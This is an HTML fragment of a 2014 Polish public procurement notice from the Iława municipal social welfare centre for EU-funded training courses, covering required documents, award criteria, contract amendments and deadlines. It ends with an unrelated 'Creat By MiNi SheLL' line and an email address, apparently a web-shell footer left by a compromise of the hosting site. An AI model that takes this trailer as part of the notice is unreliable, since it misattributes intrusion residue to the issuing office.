<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do siwz, 
2) oferta wraz z załącznikami musi być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, W przypadku przedsiębiorcy zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze (np. w ewidencji działalności gospodarczej). Do oferty należy dołączyć dokument lub pełnomocnictwo, z którego wynika uprawnienie osoby (osób) do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli prawo to nie wynika z rejestru. W takiej sytuacji dokument lub pełnomocnictwo muszą być integralną częścią oferty. 
3) oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy (w przypadku oferty składanej wspólnie przez kilku Wykonawców, oświadczenie składa każdy wykonawca) z wykorzystaniem wzoru - załącznik nr 2 do siwz, 
4) oświadczenie dotyczące podwykonawców - załącznik nr 7 do siwz.
5) oświadczenie o dysponowaniu salami dydaktycznymi - załącznik nr 6 do siwz
6) Karta Szkolenia - załącznik nr 5 do siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Kwalifikacje kadry dydaktycznej - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa,  która będzie podpisana w wyniku rozstrzygnięcia niniejszego postępowania o udzielenie zamówienia, będzie zawierała wszystkie zapisy podane we wzorze umowy stanowiący załącznik nr 8 do niniejszej specyfikacji, z uwzględnieniem treści ofert.
2. Zmiana umowy w sprawie zamówienia publicznego co do zakresu zadania, kadry dydaktycznej, ceny i terminu oraz osób prowadzących zajęcia może nastąpić na umotywowany pisemny wniosek jednej ze stron umowy po uzyskaniu zgody drugiej strony w formie aneksu z zachowaniem formy pisemnej w następujących przypadkach:
a) zmniejszenia liczby osób i kosztu szkolenia, w przypadku rezygnacji uczestników i uczestniczek szkoleń
b) zwiększenia liczby osób i kosztu szkolenia, gdyby uczestnik lub uczestniczka szkolenia zgłosiła nieoczekiwaną chęć wzięcia udziału w kursie
c) miejsca szkolenia, w przypadku, gdy Wykonawca zaproponuje lepsze warunki lokalowe wymienione w ofercie, w przypadku awarii sali szkoleniowej lub budynku uniemożliwiającej przeprowadzenie zajęć lub kiedy umowa między Wykonawcą a właścicielem sali przeznaczonej na szkolenie zostanie rozwiązana z przyczyn nie lezących po stronie wykonawcy.
d) harmonogramu przeprowadzonych zajęć lub godzin zajęć w ciągu dnia, w przypadku, kiedy wykładowca przewidziany do realizacji danego modułu ze względów zdrowotnych, rodzinnych lub zawodowych nie może przeprowadzić zajęć w danym terminie,
e) kadry dydaktycznej, w przypadku, kiedy wykładowca przewidziany do realizacji danego modułu z przyczyn nie leżących po stronie wykonawcy nie może kontynuować zlecenia 
f) zmiany preferencji uczestników lub uczestniczek kursu i przekierowanie do innej grupy na jego prośbę 
g) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą należy rozumieć zdarzenie zewnętrzne wobec łączącej strony więzi prawnej: o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć, ani któremu nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków 
atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
h) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron
i) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
j) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy oraz terminy wynikające z harmonogramu
k) gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami, albo groziłoby wykonawcy rażącą stratą w rozumieniu art. 357 Kodeksu Cywilnego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Iławie
ul. Grunwaldzka 6a
14-200 Iława 
pokój 110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2014 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Iławie
ul. Grunwaldzka 6a
14-200 Iława 
pokój 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 7.1.1., tytuł projektu Masz Okazję - Pomóż Sobie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com